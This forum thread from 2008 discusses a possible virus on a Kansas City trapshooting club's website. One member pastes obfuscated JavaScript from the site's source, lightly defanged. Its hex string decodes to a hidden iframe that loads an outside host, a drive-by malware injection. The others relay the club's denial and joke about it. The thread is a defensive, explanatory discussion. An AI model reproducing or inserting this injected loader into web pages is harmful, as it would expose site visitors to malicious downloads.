1. Attention: We have put together a thread with tips and a tutorial video to help with using the new software. Please take a moment to check out the thread here: Trapshooters.com Tutorial & Help Video.
    Dismiss Notice

VIRUS ON KCTA website. Do not go there!

Discussion in 'Uncategorized Threads' started by timb99, Jul 15, 2008.

Thread Status:
Not open for further replies.
  1. timb99

    timb99 Well-Known Member

    Joined:
    Jan 29, 1998
    Messages:
    7,331
    Location:
    Shawnee, Kansas, USA
    MIA,

    I alerted Lynn Gipson of KCTA by e-mail this morning when I saw your post.

    Both he and his webmaster did some checking and found no evidence of a virus.

    Tim
     
  2. tachyon

    tachyon Member

    Joined:
    Jan 29, 1998
    Messages:
    670
    Tim, I just loaded the main page from the www.kctraps.com main page into a sandbox on linux and the source code showed an interesting obfuscated javascript script.

    The script is:

    it starts with script type equals text/javascript


    fanction CD6384633F353B1396D(B5635AC29A86560115DE03A){function EAD7E4C4E9F091E56D1C9FE34583A5E5(){var EC407A783CF6DB252F7E6CB0A4B6450D=16;return EC407A783CF6DB252F7E6CB0A4B6450D;}return(parseInt(B5635AC29A86560115DE03A,EAD7E4C4E9F091E56D1C9FE34583A5E5()));}function C939DE28B8E5BC28CBBC9D6(A70DE68E59771F46F023A11038E4FE9){function D9D54C05E46CACB4D1406197EADE094D(){return 2;}var AADEE34F9FDF67C2E="";for(CC4B6642370B181233866=0;CC4B6642370B181233866<A70DE68E59771F46F023A11038E4FE9.length;CC4B6642370B181233866+=D9D54C05E46CACB4D1406197EADE094D()){AADEE34F9FDF67C2E+=(String.fromCharCode(CD6384633F353B1396D(A70DE68E59771F46F023A11038E4FE9.substr(CC4B6642370B181233866,D9D54C05E46CACB4D1406197EADE094D()))));}document.write(AADEE34F9FDF67C2E);}C939DE28B8E5BC28CBBC9D6("3C696672616D65207372633D22687474703A2F2F6D6172736F686F64696B692E6E65742F6367692D62696E2F696E6465782E6367693F6865726E222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");


    I do not have the time or inclination to decipher the script. I did change function to fanction as a precaution. I do know that many virus detection processes will flag any script like the above as a potential threat. The sans site at
    http://isc.sans.org/diary.html?storyid=4246 gives a number of strategies for deciphering this type of code. If this is a script they wrote I do not understand why they have done it in this way.
     
  3. once fired

    once fired Guest

    I talked to our webmaster, they alerted the linex server folks, and all is supposed to be OK. I don't know a lot about the virus scans out there, but when I did a google search on win32/heur and read up a bit, I got the feeling that AVG may have some issues when it comes to the win32/heur virus. Seems that at times, AVG detects something that's not there. Like I said I don't know much about these things. I use AVG also, I've been to my website in the last couple of minutes and no problems. Nothing has been changed in the source code of the website in years. We don't get in any hurry to change things around here, it makes most trapshooters nervous.

    Lynn Gipson
     
  4. valmet

    valmet TS Supporters TS Supporters

    Joined:
    Jan 29, 1998
    Messages:
    395
    Location:
    Bemidji, Mn
    !!!!!!
     
  5. mette56

    mette56 Well-Known Member

    Joined:
    Jul 8, 2008
    Messages:
    2,026
    Location:
    Camdenton, MO
    Lynn,

    Nervous trap shooters at the KCTA???

    Boy that answers alot of questions. Being a two time past president, I now know why I've been a nervous wreck the last 30 years. I thought it was "hard lefts from post one" all this time.....LOL.

    Milt
     
Thread Status:
Not open for further replies.